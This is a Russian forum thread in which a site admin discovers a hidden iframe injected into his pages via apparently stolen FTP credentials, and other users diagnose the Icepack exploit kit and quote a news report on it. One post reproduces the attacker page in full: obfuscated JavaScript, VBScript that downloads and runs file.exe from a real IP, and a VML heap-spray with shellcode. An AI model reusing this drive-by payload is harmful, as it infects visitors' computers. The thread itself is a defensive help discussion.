Вирь (iframe) на сайте, помогите победить тварь поганую
Меняй пароль на ftp доступ к сайту.
А эта хрень могла как-то этот пароль выцепить откуда-то и подключаться самостоятельно? Я на фтп FARом захожу.
Похоже, где то сохраняешь пароль от него.
Я не вбиваю его каждый раз вручную, считать с клавиатуры не выйдет. А если она смогла этот пароль выцепить из FARа (или куда он там записал его? в реестр? то что ей помешает сделать это во второй раз? Получается, надо другим ФТПшником пользоваться.
Блин, а тем временем симантек отловил и замочил первого виря.
Кстати, проверил реестр - ФАР там пароли от фтпшников хранит. Правда, он их шифрует как-то, но это, может быть, легко ломается.
http://www.google.ru/search?q=203.223.153.252&ie=utf-8&a...
выдатё ровно один заражённый сайт
А если спросить так:
http://www.google.ru/search?hl=ru&hs=Qxf&q=%2Fiframe...
то прямо первая ссылка приведёт нас на сайт Каспера...
<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,44,42,11,39,30,43,14,36,7,0,0,0,0,0,0,25,13,5,4,15,19,8,24,53,58
,61,47,29,28,52,56,55,6,26,50,33,2,35,27,1,45,59,0,0,0,0,32,0,48,40,18,20,62,57,51,16,54,3,60,23,31,49,41,17,9
,21,22,12,0,37,46,10,38,34);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)
-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("BU")
</script>
<script language="vbscript">
Const adModeReadWrite=3
Const adTypeBinary=1
Const
adSaveCreateOverWrite=2
Dim oFSO
Dim oStream
Dim oWShell
Dim PluginFile
Dim cByte
Dim ObjName
Dim ObjProg
ObjName="ADODB"
ObjProg="Stream"
On Error Resume Next
Set oStream=window.oRDS.CreateObject(ObjName & "." & ObjProg,"")
If Err.number <> 0 Then
Set oFSO=window.oRDS.CreateObject("Scripting.Fi" & "leSystemObject","")
Set PluginFile=oFSO.CreateTextFile(window.exeName,
TRUE)
Plugin_size=LenB(window.XMLBody)
For j=1 To Plugin_size
cByte=MidB(window.XMLBody,j,1)
ByteCode=AscB(cByte)
PluginFile.Write(Chr(ByteCode
Next
PluginFile.Close
Set oWShell=window.oRDS.CreateObject("WScri" & "pt.Shell","")
On Error Resume Next
oWShell.Run (window.exeName1,FALSE
Else
oStream.Mode=adModeReadWrite
oStream.Type=adTypeBinary
oStream.Open
oStream.Write window.XMLBody
oStream.SaveToFile
window.exeName,adSaveCreateOverWrite
window.oShellApp.ShellExecute window.exeName
End If
</script>
<script language="VBScript">
on error resume next
dl = "http://203.223.153.252/exp/exe.php"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
str1="Mic"
str2="roso"
str3="ft."
str4="XML"
str5="HTTP"
str=str1&str2&str3&str4&str5
Set x = df.CreateObject(str,"")
awb1="A"
awb2="dod"
awb3="b.S"
awb4="t"
awb5="re"
awb6="am"
strb1=awb1&awb2&awb3&awb4&awb5&awb6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="file.exe"
scrip1="Scrip"
scrip2="ting"
scrip3=".Fil"
scrip4="eSyste"
scrip5="mObject"
scrip=scrip1&scrip2&scrip3&scrip4&scrip5
set FF = df.createobject(scrip,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<style>v\:* { behavior: url(#ffgxygv); }</style>
</head>
<body>
<object id="ffgxygv" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<script language="javascript">
lsyq = '%u9090%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%ueb00%ufe8b%u2e80%u800d%u0736%ue246%uebf7%ue805%uffe9%uffff%ubafb%u1414%u6514%ub370%u1444%u1414';
npms = '%u5499%u9918%u2884%u99b7%u1c7c%ufd99%u107a%ufc6b%u145a%u1414%u0bf2%u757c%u1476%u7c14%u827f%u7778%u0560%u991e%ufcfc%u1440%u1414%uf891%u9934%u7ae8%u6134%u5e05%ucd10%u2c10%u7168%u7f84%u50cd%u102c%u6f36%u6f8c%u50ce%u1c2c%u4114%u64d4%u6164%u645d%u5e05%u9924%u7ae8%u610f%u5e05%u051c%u185e%u5e63%u7f99%u9948%u3f80%u118c%u5eff%u7e99%u1134%u41ff%u5bdb%ub753%ucf11%ue941%uc615%u4c24%u8002%ud31c%u17d9%uea11';
egot = '%uf954%u4903%u7f25%u66ed%u6699%u1130';
sgdb = '%u6ee7%u1899%u9959%u2866%ue711%u1099%u1199%ub9cf%u6b66%ufcd1%u0563%u0505%u5696%uf816%ue9f7%u0cf8%u06ac';
mjgo = '%u169a%uec86%u81f2%u2a3e%u8435';
pwrm = '%u807c%u8480%u354a%u4235%u4144%u4236%u4142%u4336%u413f%u4236%u423f%u6f35%u848c%u6f35%u6f8c%u8436%u847c';
dryr = '%u0014';
mwp = lsyq+npms+egot+sgdb+mjgo+pwrm+dryr;
var rgmt = unescape(mwp);
vgs = unescape("%u9090"+"%u9"+"090");
slpyz = 1+3+1+1+5+1+3+5;
zyftrb = 1+15+1+8+11+1+7+1+1+1+1+1+1+1+1+1+1+1+1+1+15+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+2+1+1+16+1+1+6+1;
wahlwz = slpyz + rgmt.length;
while (vgs.length < wahlwz)
vgs += vgs;
zrwqvjn = vgs.substring(0, wahlwz);
oirgt = vgs.substring(0, vgs.length-wahlwz);
while (oirgt.length + wahlwz < "0"+"x3"+"0000")
oirgt = oirgt + oirgt + zrwqvjn;
sjis = new Array;
for (i=0;i<zyftrb;i++) {
sjis[i] = oirgt + rgmt;
}
</script>
<div id="znpylp"></div>
<script language="javascript">
igmrtw = "<v"+":rect><v:fill me"+"thod = '";
comw = "&"+"#x060"+"6;"+""+"0"+"6"+";"+"
for (i=0; i<3500; ++i) {
igmrtw = igmrtw + comw;
}
igmrtw = igmrtw + "'"+">"+"</v"+":"+"re"+"ct></"+"v"+":fill"+">";
document.getElementById("znpylp").innerHTML = igmrtw;
</script>
</body>
</html>
А дадут ли ему это сделать?
а по теме, на такой вирус должны быть нормальные хтаксесы
Если на компе установлен WinXP SP2 БЕЗ ОБНОВЛЕНИЙ - ДАДУТ
Ща покопаюсь - может сохранилась, может там есть как лечить
UPD нашел! называется вирус, даже не вирус, а, как пишут, какерская утилитка
Icepack.
вот ссылка в тему http://www.klerk.ru/soft/n/?81774
Если вирусы продаются, значит это кому-нибудь нужно
ИА "Клерк.Ру". Отдел новостей / PandaLabs констатировала наличие в сети определенной бизнес-модели,
основанной на разработке и продаже вредоносных приложений. В частности, компания обнаружила новую
опасную утилиту, устанавливающую вредоносное ПО с помощью эксплойтов. Эта утилита носит название
Icepack и продается в интернете за 400 долларов США. Она дополняет ряд других утилит, обнаруженных
PandaLabs в последнее время, таких как Mpack, XRummer, Zunker, Barracuda, Pinch и др., подтверждая
успешность и выгодность бизнеса, который развивается в интернете за счет создания и продажи
вредоносных приложений.
Icepack заражает компьютеры следующим образом: утилита получает доступ к определенной веб-странице,
куда оно добавляет iframe-ссылку, ведущую на сервер, на котором установлено данное приложение.
Основное отличие Icepack заключается в том, что такую ссылку добавляет сама утилита. Предыдущим
приложениям, таким как Mpack, были необходимы действия хакера, который вручную осуществлял доступ
к веб-страницам, на которые затем добавлялась ссылка.
При посещении таких искаженных страниц пользователями, активируется Icepack, которая анализирует
компьютер пользователя на предмет уязвимостей. При положительном результате, она скачивает из сети
эксплойт, необходимый для использования имеющейся в компьютере уязвимости. Еще один отличительный
признак Icepack - это то, что она использует эксплойты, соответствующие самым последним выявленным
уязвимостям. Этому есть разумное объяснение – в таком случае существует меньшая вероятность того,
что пользователи уже обновили свои компьютеры для исправления новейших брешей безопасности.
После этого кибер-преступники могут загружать на зараженные компьютеры любое вредоносное ПО. Если
учесть стоимость утилиты, скорее всего она будет загружать вредоносные коды, наиболее часто
использующиеся для кражи конфиденциальных данных и позволяющие заниматься онлайновым
мошенничеством (трояны, шпионское ПО, боты и др.).
Другое нововведение в Icepack – это то, что она сочетает в себе программу проверки ftp и iframe.
Первая помогает кибер-преступникам пользоваться информацией об учетных записях FTP, украденных с
зараженных компьютеров. Данные этих учетных записей проходят через специальную программу проверки,
чтобы удостовериться в их подлинности. Утилита добавляет в учетную запись iframe-ссылку, ведущую к
Icepack. Повторением этого процесса приложение начинает свой “жизненный цикл” заново.
напиши провайдеру этого чувака (203.223.153.252 что он занимается незаконной деятельностью.
Недавно(вчера-позавчера) читал в рассылках от мобайл-ревью новость о таком вирусеПохоже, это мой случай.
Только ты бы свой пост подредактировал чуток, а то строчки длинные.
************************
Суть постов с длинным куском кода не очень понял. Товарищи, можно для "тёмных" пояснить, о чём речь?
А пароли от фтп, видимо, придётся-таки поменять. На всякий случай.
И лечись от вирусов.
Как я уже написал выше, исходный файл вируса называется file1.exe
203.223.153.252Ужо добавил этот айпишнег в таблице маршрутизации на интерфейс lo0.
а конкретно этому хакеру может вставить провайдер.
в общем, я бы написал прову: aims.com.my
http://www.nic.ru/whois/?query=203.223.153.252
Гг! только прочитал статью, каспер поймал что-то подобное - коллега словил
Оставить комментарий
arturabramian
Короче есть сайт, который я админю, лажу туда постоянно по фтп, в базы залезаю. В субботу обнаружил в тексте одного из скриптов с именем index.php вот такую приписку:<iframe src='http://203.223.153.252/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe>
Проверил - аналогичная дрянь ещё в нескольких index.php и index.html
Написал на хостинг, типа у вас на сервере вирус - они говорят типа "нихера, это у кого-то из тех, кто по фтп лазит на компе вирус, так что сами разбирайтесь". Но из всех, кто имеет фтп-доступ, наиболее вероятная кандидатура это я, потому что остальные на сайт редко ходят.
Заражение (изменение файлов) на сервере происходило в субботу и в воскресенье примерно в час дня. Не исключено, что в это время я действительно мог по фтп-шнику заходить на сайт, но я точно не помню. В ответ службы поддержки хостинга я не до конца верю, как то это уж больно в стиле "ваши проблемы нас не е%%т" прозвучало.
Я, конечно, свой комп антивирусом проверю, но вообще это реально так может быть, что на моём компе какая-то дрянь ловит моменты соединения по фтп и дописывает куски текста в файлах на сервере?